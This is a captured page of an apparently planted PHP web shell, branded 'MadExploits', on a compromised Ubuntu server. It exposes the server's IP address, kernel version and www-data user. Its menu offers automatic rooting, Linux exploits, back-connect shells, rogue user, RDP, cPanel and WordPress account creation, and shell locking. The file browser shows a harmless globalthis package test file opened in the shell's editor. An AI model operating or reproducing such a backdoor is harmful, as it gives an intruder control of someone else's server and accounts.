Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
globalthis /
test /
[ HOME SHELL ]
Name
Size
Permission
Action
implementation.js
213
B
-rw-rw-rw-
index.js
196
B
-rw-rw-rw-
native.js
767
B
-rw-rw-rw-
shimmed.js
900
B
-rw-rw-rw-
tests.js
1.37
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tests.js
/* jscs:disable requireUseStrict */ /* eslint strict: 0, max-statements: 0 */ module.exports = function (theGlobal, t) { t.equal(typeof theGlobal, 'object', 'is an object'); t.test('built-in globals', function (st) { st.equal(theGlobal.Math, Math, 'Math is on the global'); st.equal(theGlobal.JSON, JSON, 'JSON is on the global'); st.equal(theGlobal.String, String, 'String is on the global'); st.equal(theGlobal.Array, Array, 'Array is on the global'); st.equal(theGlobal.Number, Number, 'Number is on the global'); st.equal(theGlobal.Boolean, Boolean, 'Boolean is on the global'); st.equal(theGlobal.Object, Object, 'Object is on the global'); st.equal(theGlobal.Function, Function, 'Function is on the global'); st.equal(theGlobal.Date, Date, 'Date is on the global'); st.equal(theGlobal.RegExp, RegExp, 'RegExp is on the global'); if (typeof Symbol === 'undefined') { st.comment('# SKIP Symbol is not supported'); } else { st.equal(theGlobal.Symbol, Symbol, 'Symbol is on the global'); } st.end(); }); t.test('custom property', function (st) { var key = 'random_custom_key_' + new Date().getTime(); var semaphore = {}; /* eslint no-eval: 1 */ eval(key + ' = semaphore;'); st.equal(theGlobal[key], semaphore, 'global variable ends up on the global object'); delete theGlobal[key]; // eslint-disable-line no-param-reassign st.end(); }); };
Close